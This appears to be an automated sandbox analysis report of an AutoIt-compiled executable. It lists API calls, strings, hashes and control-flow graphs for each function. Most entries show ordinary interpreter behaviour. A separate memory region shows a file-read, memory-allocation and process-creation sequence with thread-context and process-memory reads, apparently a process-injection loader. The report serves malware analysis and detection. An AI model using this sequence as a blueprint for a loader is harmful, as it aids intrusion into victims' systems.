                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                            • API String ID: 2914291525-1005189915
                                                            • Opcode ID: e7331790e6edec2677961772654a47e6df465d071f23a6957f707e51400bcbf8
                                                            • Instruction ID: 695282b6e0b94424f3182ed38421c63a7b09701a8ab3c611131d7a761532c851
                                                            • Opcode Fuzzy Hash: e7331790e6edec2677961772654a47e6df465d071f23a6957f707e51400bcbf8
                                                            • Instruction Fuzzy Hash: 9021B4B1901258AFDB00EFE4E849ADDBBF8FB08710F14422BF610E62A1E7B545549F91
                                                            Function 008171EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 00814864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,008D62F8,?,008137C0,?), ref: 00814882
                                                              • Part of subcall function 0083074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,008172C5), ref: 00830771
                                                            • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00817308
                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0084ECF1
                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0084ED32
                                                            • RegCloseKey.ADVAPI32(?), ref: 0084ED70
                                                            • _wcscat.LIBCMT ref: 0084EDC9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                            • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                            • API String ID: 2673923337-2727554177
                                                            • Opcode ID: df1578223181c3da5bdf3ebe8989e31eb5f81145ad362c371add80d4eb60c413
                                                            • Instruction ID: 22ef1b37382278593beb54c32a508af185812dd691d994895f6b2e93c100f821
                                                            • Opcode Fuzzy Hash: df1578223181c3da5bdf3ebe8989e31eb5f81145ad362c371add80d4eb60c413
                                                            • Instruction Fuzzy Hash: E2717D715093459EC714EF69EC8199BBBF8FF94710F44062EF556C32A1EB309988CBA2
                                                            Function 00813A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • GetSysColorBrush.USER32(0000000F), ref: 00813A62
                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00813A71
                                                            • LoadIconW.USER32(00000063), ref: 00813A88
                                                            • LoadIconW.USER32(000000A4), ref: 00813A9A
                                                            • LoadIconW.USER32(000000A2), ref: 00813AAC
                                                            • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00813AD2
                                                            • RegisterClassExW.USER32(?), ref: 00813B28
                                                              • Part of subcall function 00813041: GetSysColorBrush.USER32(0000000F), ref: 00813074
                                                              • Part of subcall function 00813041: RegisterClassExW.USER32(00000030), ref: 0081309E
                                                              • Part of subcall function 00813041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008130AF
                                                              • Part of subcall function 00813041: InitCommonControlsEx.COMCTL32(?), ref: 008130CC
                                                              • Part of subcall function 00813041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008130DC
                                                              • Part of subcall function 00813041: LoadIconW.USER32(000000A9), ref: 008130F2
                                                              • Part of subcall function 00813041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00813101
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                            • String ID: #$0$AutoIt v3
                                                            • API String ID: 423443420-4155596026
                                                            • Opcode ID: 9353742b590e40aa1fb9afb01999fd9aa0b8e565d3dfa2866d742990c3283c01
                                                            • Instruction ID: f9e97f9ed5c59b38e4a76df8732ba4b4898a2b8db3c48e94c8d05d881071b5c5
                                                            • Opcode Fuzzy Hash: 9353742b590e40aa1fb9afb01999fd9aa0b8e565d3dfa2866d742990c3283c01
                                                            • Instruction Fuzzy Hash: 12212D71902308AFDB14AFA4EC09B9D7FF5FB08711F10422BF604A62A1E3B655649F54
                                                            Function 00813633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 767 813633-813681 769 8136e1-8136e3 767->769 770 813683-813686 767->770 769->770 771 8136e5 769->771 772 8136e7 770->772 773 813688-81368f 770->773 774 8136ca-8136d2 DefWindowProcW 771->774 775 84d31c-84d34a call 8211d0 call 8211f3 772->775 776 8136ed-8136f0 772->776 777 813695-81369a 773->777 778 81375d-813765 PostQuitMessage 773->778 780 8136d8-8136de 774->780 811 84d34f-84d356 775->811 782 8136f2-8136f3 776->782 783 813715-81373c SetTimer RegisterWindowMessageW 776->783 784 8136a0-8136a2 777->784 785 84d38f-84d3a3 call 872a16 777->785 781 813711-813713 778->781 781->780 791 8136f9-81370c KillTimer call 8144cb call 813114 782->791 792 84d2bf-84d2c2 782->792 783->781 786 81373e-813749 CreatePopupMenu 783->786 787 813767-813776 call 814531 784->787 788 8136a8-8136ad 784->788 785->781 803 84d3a9 785->803 786->781 787->781 793 84d374-84d37b 788->793 794 8136b3-8136b8 788->794 791->781 798 84d2c4-84d2c6 792->798 799 84d2f8-84d317 MoveWindow 792->799 793->774 809 84d381-84d38a call 86817e 793->809 801 81374b-81375b call 8145df 794->801 802 8136be-8136c4 794->802 806 84d2e7-84d2f3 SetFocus 798->806 807 84d2c8-84d2cb 798->807 799->781 801->781 802->774 802->811 803->774 806->781 807->802 812 84d2d1-84d2e2 call 8211d0 807->812 809->774 811->774 816 84d35c-84d36f call 8144cb call 8143db 811->816 812->781 816->774
                                                            APIs
                                                            • DefWindowProcW.USER32(?,?,?,?), ref: 008136D2
                                                            • KillTimer.USER32(?,00000001), ref: 008136FC
                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0081371F
                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0081372A
                                                            • CreatePopupMenu.USER32 ref: 0081373E
                                                            • PostQuitMessage.USER32(00000000), ref: 0081375F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                            • String ID: TaskbarCreated
                                                            • API String ID: 129472671-2362178303
                                                            • Opcode ID: 304f82a023df226fedb704a54516292997dd45e30192626362dbacb9de37b409
                                                            • Instruction ID: 29c83c8930692175341e8d83885925c7b7723ef3eb9303538f3fe3deea3c995f
                                                            • Opcode Fuzzy Hash: 304f82a023df226fedb704a54516292997dd45e30192626362dbacb9de37b409
                                                            • Instruction Fuzzy Hash: C941CAB120514DB7DB156F68EC49BF9375DFF10300F14063BF602D62E1EB649DA4A662
                                                            Function 00813778 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                            • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                                            • API String ID: 1825951767-3513169116
                                                            • Opcode ID: 8642e73bb8f5a81cf65c14bd67b888b31c1fae9bcb33b09cf0811a545f20a347
                                                            • Instruction ID: 331b8a7eb55b7ee83e0c4b5b4ae8bb95dd2127e66f2428ddf589ae2b25c11adf
                                                            • Opcode Fuzzy Hash: 8642e73bb8f5a81cf65c14bd67b888b31c1fae9bcb33b09cf0811a545f20a347
                                                            • Instruction Fuzzy Hash: E3A11B7191022D9ACF04EBA8DC95EEEB77DFF14300F14052AE416E7191EF749A89CB61
                                                            Function 024425B0 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 942 24425b0-244265e call 2440000 945 2442665-244268b call 24434c0 CreateFileW 942->945 948 2442692-24426a2 945->948 949 244268d 945->949 957 24426a4 948->957 958 24426a9-24426c3 VirtualAlloc 948->958 950 24427dd-24427e1 949->950 951 2442823-2442826 950->951 952 24427e3-24427e7 950->952 954 2442829-2442830 951->954 955 24427f3-24427f7 952->955 956 24427e9-24427ec 952->956 959 2442885-244289a 954->959 960 2442832-244283d 954->960 961 2442807-244280b 955->961 962 24427f9-2442803 955->962 956->955 957->950 963 24426c5 958->963 964 24426ca-24426e1 ReadFile 958->964 967 244289c-24428a7 VirtualFree 959->967 968 24428aa-24428b2 959->968 965 2442841-244284d 960->965 966 244283f 960->966 969 244280d-2442817 961->969 970 244281b 961->970 962->961 963->950 971 24426e3 964->971 972 24426e8-2442728 VirtualAlloc 964->972 975 2442861-244286d 965->975 976 244284f-244285f 965->976 966->959 967->968 969->970 970->951 971->950 973 244272f-244274a call 2443710 972->973 974 244272a 972->974 982 2442755-244275f 973->982 974->950 979 244286f-2442878 975->979 980 244287a-2442880 975->980 978 2442883 976->978 978->954 979->978 980->978 983 2442761-2442790 call 2443710 982->983 984 2442792-24427a6 call 2443520 982->984 983->982 990 24427a8 984->990 991 24427aa-24427ae 984->991 990->950 992 24427b0-24427b4 FindCloseChangeNotification 991->992 993 24427ba-24427be 991->993 992->993 994 24427c0-24427cb VirtualFree 993->994 995 24427ce-24427d7 993->995 994->995 995->945 995->950
                                                            APIs
                                                            • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 02442681
                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 024428A7
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2116009755.0000000002440000.00000040.00001000.00020000.00000000.sdmp, Offset: 02440000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_2440000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: CreateFileFreeVirtual
                                                            • String ID:
                                                            • API String ID: 204039940-0
                                                            • Opcode ID: e7fcc9d0c03c8eebee60ddba528add67e317e316073a556d8272a5bdc8b54fa5
                                                            • Instruction ID: 28440b081392a02df9c91e90b6c1c198224cc2f039fe9d0c69e5a318f7748b09
                                                            • Opcode Fuzzy Hash: e7fcc9d0c03c8eebee60ddba528add67e317e316073a556d8272a5bdc8b54fa5
                                                            • Instruction Fuzzy Hash: C9A1FD74E00209EBEB14CFA4C994BEEB7B5BF48704F20855AE505BB280DBB55A81CF54
                                                            Function 008139E7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1073 8139e7-813a57 CreateWindowExW * 2 ShowWindow * 2
                                                            APIs
                                                            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00813A15
                                                            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00813A36
                                                            • ShowWindow.USER32(00000000,?,?), ref: 00813A4A
                                                            • ShowWindow.USER32(00000000,?,?), ref: 00813A53
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Window$CreateShow
                                                            • String ID: AutoIt v3$edit
                                                            • API String ID: 1584632944-3779509399
                                                            • Opcode ID: 0dd6673e8c06ab9daa11b367c2684f1e05cc31ae5e0bd2b73b88021622481e88
                                                            • Instruction ID: 4c5d660cd3e96c0e7785d5e89773d21686b08484912f83fe37d36d4f131a4835
                                                            • Opcode Fuzzy Hash: 0dd6673e8c06ab9daa11b367c2684f1e05cc31ae5e0bd2b73b88021622481e88
                                                            • Instruction Fuzzy Hash: BBF03A706022987EEE3027636C48E673F7DF7C6F60F00022BBA00E2171D2A60820CAB0
                                                            Function 024423B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 134fileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1074 24423b0-24424b1 call 2440000 call 24422a0 CreateFileW 1081 24424b3 1074->1081 1082 24424b8-24424c8 1074->1082 1083 2442568-244256d 1081->1083 1085 24424cf-24424e9 VirtualAlloc 1082->1085 1086 24424ca 1082->1086 1087 24424ed-2442504 ReadFile 1085->1087 1088 24424eb 1085->1088 1086->1083 1089 2442506 1087->1089 1090 2442508-2442542 call 24422e0 call 24412a0 1087->1090 1088->1083 1089->1083 1095 2442544-2442559 call 2442330 1090->1095 1096 244255e-2442566 ExitProcess 1090->1096 1095->1096 1096->1083
                                                            APIs
                                                              • Part of subcall function 024422A0: Sleep.KERNELBASE(000001F4), ref: 024422B1
                                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 024424A7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2116009755.0000000002440000.00000040.00001000.00020000.00000000.sdmp, Offset: 02440000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_2440000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: CreateFileSleep
                                                            • String ID: 147ZS7DUC5
                                                            • API String ID: 2694422964-1966479656
                                                            • Opcode ID: cb6d10417450f0ddf2bb1d12b739a56ad1a32c3ae96cdff8a9dc1a47aceedb3c
                                                            • Instruction ID: f2dcd6a61ddf421ca486617b4b02d50488bfe7c91733d79dfa3947921e5f9d48
                                                            • Opcode Fuzzy Hash: cb6d10417450f0ddf2bb1d12b739a56ad1a32c3ae96cdff8a9dc1a47aceedb3c
                                                            • Instruction Fuzzy Hash: 2E514E31D04349EBEF10DBA4C815BEEBB79AF58340F004199E609BB2C0DAB95B45CBA5
                                                            Function 0081410D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1098 81410d-814123 1099 814200-814204 1098->1099 1100 814129-81413e call 817b76 1098->1100 1103 814144-814164 call 817d2c 1100->1103 1104 84d5dd-84d5ec LoadStringW 1100->1104 1107 84d5f7-84d60f call 817c8e call 817143 1103->1107 1108 81416a-81416e 1103->1108 1104->1107 1117 81417e-8141fb call 833020 call 81463e call 832ffc Shell_NotifyIconW call 815a64 1107->1117 1120 84d615-84d633 call 817e0b call 817143 call 817e0b 1107->1120 1110 814205-81420e call 8181a7 1108->1110 1111 814174-814179 call 817c8e 1108->1111 1110->1117 1111->1117 1117->1099 1120->1117
                                                            APIs
                                                            • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0084D5EC
                                                              • Part of subcall function 00817D2C: _memmove.LIBCMT ref: 00817D66
                                                            • _memset.LIBCMT ref: 0081418D
                                                            • _wcscpy.LIBCMT ref: 008141E1
                                                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 008141F1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                            • String ID: Line:
                                                            • API String ID: 3942752672-1585850449
                                                            • Opcode ID: ecbd89cf18fd894d984d8d1c3d2301d252d1d99e05a25979392ac70bf6f531da
                                                            • Instruction ID: 31c4300600c95fc9bfa38632b5120305768ba1f17b6224464a1491b882a7dfa4
                                                            • Opcode Fuzzy Hash: ecbd89cf18fd894d984d8d1c3d2301d252d1d99e05a25979392ac70bf6f531da
                                                            • Instruction Fuzzy Hash: 82319C71009318AAE721EB68DC46BDA77ECFF44314F10461EF195D21A2EB74A698CB93
                                                            Function 0083564D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1133 83564d-835666 1134 835683 1133->1134 1135 835668-83566d 1133->1135 1137 835685-83568b 1134->1137 1135->1134 1136 83566f-835671 1135->1136 1138 835673-835678 call 838d68 1136->1138 1139 83568c-835691 1136->1139 1151 83567e call 838ff6 1138->1151 1141 835693-83569d 1139->1141 1142 83569f-8356a3 1139->1142 1141->1142 1144 8356c3-8356d2 1141->1144 1145 8356b3-8356b5 1142->1145 1146 8356a5-8356b0 call 833020 1142->1146 1149 8356d4-8356d7 1144->1149 1150 8356d9 1144->1150 1145->1138 1148 8356b7-8356c1 1145->1148 1146->1145 1148->1138 1148->1144 1153 8356de-8356e3 1149->1153 1150->1153 1151->1134 1155 8356e9-8356f0 1153->1155 1156 8357cc-8357cf 1153->1156 1157 8356f2-8356fa 1155->1157 1158 835731-835733 1155->1158 1156->1137 1157->1158 1161 8356fc 1157->1161 1159 835735-835737 1158->1159 1160 83579d-83579e call 840df7 1158->1160 1162 83575b-835766 1159->1162 1163 835739-835741 1159->1163 1170 8357a3-8357a7 1160->1170 1165 835702-835704 1161->1165 1166 8357fa 1161->1166 1171 83576a-83576d 1162->1171 1172 835768 1162->1172 1168 835743-83574f 1163->1168 1169 835751-835755 1163->1169 1173 835706-835708 1165->1173 1174 83570b-835710 1165->1174 1167 8357fe-835807 1166->1167 1167->1137 1175 835757-835759 1168->1175 1169->1175 1170->1167 1176 8357a9-8357ae 1170->1176 1177 8357d4-8357d8 1171->1177 1178 83576f-83577b call 834916 call 8410ab 1171->1178 1172->1171 1173->1174 1174->1177 1179 835716-83572f call 840f18 1174->1179 1175->1171 1176->1177 1180 8357b0-8357c1 1176->1180 1181 8357ea-8357f5 call 838d68 1177->1181 1182 8357da-8357e7 call 833020 1177->1182 1194 835780-835785 1178->1194 1190 835792-83579b 1179->1190 1186 8357c4-8357c6 1180->1186 1181->1151 1182->1181 1186->1155 1186->1156 1190->1186 1195 83578b-83578e 1194->1195 1196 83580c-835810 1194->1196 1195->1166 1197 835790 1195->1197 1196->1167 1197->1190
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                            • String ID:
                                                            • API String ID: 1559183368-0
                                                            • Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                                            • Instruction ID: fb312783e1f546bdc6d38cec8a2e695d99494fec9e09ca862f50dee0ecff49ac
                                                            • Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                                            • Instruction Fuzzy Hash: 97519130A00B09DBDB249FA9C88566EB7A5FFD0324F648729F825D62D0EB749D508BC1
                                                            Function 008169CA Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00814F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,008D62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00814F6F
                                                            • _free.LIBCMT ref: 0084E68C
                                                            • _free.LIBCMT ref: 0084E6D3
                                                              • Part of subcall function 00816BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00816D0D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: _free$CurrentDirectoryLibraryLoad
                                                            • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                            • API String ID: 2861923089-1757145024
                                                            • Opcode ID: 8ade69ab0bf58e2fa92cba553f7b2bebca0989db9739ee9d588ccabc6874b98d
                                                            • Instruction ID: 32d3114dc0242aa942d7f0531f31b01bfcc245ee92ca55e61be0c31634d65dd4
                                                            • Opcode Fuzzy Hash: 8ade69ab0bf58e2fa92cba553f7b2bebca0989db9739ee9d588ccabc6874b98d
                                                            • Instruction Fuzzy Hash: E1913A7191061DAFCF04EFA8C8919EDB7B8FF18314F14446AE815EB291EB34A945CB61
                                                            Function 008135B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,008135A1,SwapMouseButtons,00000004,?), ref: 008135D4
                                                            • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,008135A1,SwapMouseButtons,00000004,?,?,?,?,00812754), ref: 008135F5
                                                            • RegCloseKey.KERNELBASE(00000000,?,?,008135A1,SwapMouseButtons,00000004,?,?,?,?,00812754), ref: 00813617
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: CloseOpenQueryValue
                                                            • String ID: Control Panel\Mouse
                                                            • API String ID: 3677997916-824357125
                                                            • Opcode ID: a2c4a13a7b2b3d45a05cc7aaf6ffae2e45cca89f90cb121f03d13851256cded4
                                                            • Instruction ID: 6f1e95d4f5e22218979ee062143312b47f8932404ae225bc9e1659506467817e
                                                            • Opcode Fuzzy Hash: a2c4a13a7b2b3d45a05cc7aaf6ffae2e45cca89f90cb121f03d13851256cded4
                                                            • Instruction Fuzzy Hash: 1B114871610208BFDB219FA4DC809EEB7BCFF54740F00446AF909E7210D2719E94A760
                                                            Function 024412A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 02441A5B
                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 02441AF1
                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02441B13
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2116009755.0000000002440000.00000040.00001000.00020000.00000000.sdmp, Offset: 02440000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_2440000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                            • String ID:
                                                            • API String ID: 2438371351-0
                                                            • Opcode ID: f7a3111ab7015fd8b62422fe8fc399687c9bf18e9b49b2a513bdf356eeec8a8c
